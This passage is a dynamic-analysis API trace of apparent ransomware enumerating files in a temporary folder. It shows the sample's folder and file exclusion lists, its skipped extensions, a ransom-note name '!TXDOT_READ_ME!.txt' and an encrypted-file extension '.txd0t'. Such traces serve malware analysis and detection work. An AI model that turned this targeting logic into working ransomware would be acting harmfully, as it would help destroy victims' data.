(lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\boot\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\perflogs\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\programdata\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\drivers\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\wsus\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="crypt_detect") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="cryptolocker") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="ransomware") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\WINDOWS") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.562] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files") returned 0x0 [0071.562] GetProcessHeap () returned 0xe30000 [0071.562] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.562] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0071.562] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\*") returned="C:\\588bce7c90097ed212\\2052\\*" [0071.562] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0071.562] StrCmpW (psz1=".", psz2=".") returned 0 [0071.562] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.562] StrCmpW (psz1="..", psz2=".") returned 1 [0071.562] StrCmpW (psz1="..", psz2="..") returned 0 [0071.562] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.562] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.562] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.562] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0071.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0071.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="C:\\588bce7c90097ed212\\2052\\eula.rtf" [0071.563] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.563] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.563] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.563] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.563] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.563] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.563] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.563] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.563] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.563] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.563] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.563] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.563] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.563] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.563] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0071.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0071.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" [0071.563] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.564] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.564] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.564] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.564] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.564] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.564] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.564] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.564] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.564] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.564] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.564] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.564] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.564] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.564] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0071.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0071.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" [0071.564] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.564] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.564] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.565] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.565] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.565] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.565] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.565] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0071.565] GetProcessHeap () returned 0xe30000 [0071.565] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0071.565] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0071.565] StrCmpW (psz1="2070", psz2=".") returned 1 [0071.565] StrCmpW (psz1="2070", psz2="..") returned 1 [0071.565] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2070", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system32\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\local\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\boot\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\perflogs\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\programdata\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\drivers\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\wsus\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="crypt_detect") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="cryptolocker") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="ransomware") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\WINDOWS") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files") returned 0x0 [0071.566] GetProcessHeap () returned 0xe30000 [0071.566] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xecab68 [0071.566] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0071.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\*") returned="C:\\588bce7c90097ed212\\2070\\*" [0071.566] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0071.566] StrCmpW (psz1=".", psz2=".") returned 0 [0071.566] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.566] StrCmpW (psz1="..", psz2=".") returned 1 [0071.566] StrCmpW (psz1="..", psz2="..") returned 0 [0071.566] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.566] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.566] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.567] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0071.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0071.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="C:\\588bce7c90097ed212\\2070\\eula.rtf" [0071.567] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.567] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.567] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.567] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.567] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.567] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.567] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.567] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.567] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.567] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.567] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.567] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.567] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.567] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.567] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0071.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0071.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0071.568] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.568] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.568] StrCmpIW (psz1="LocalizedData.xml", 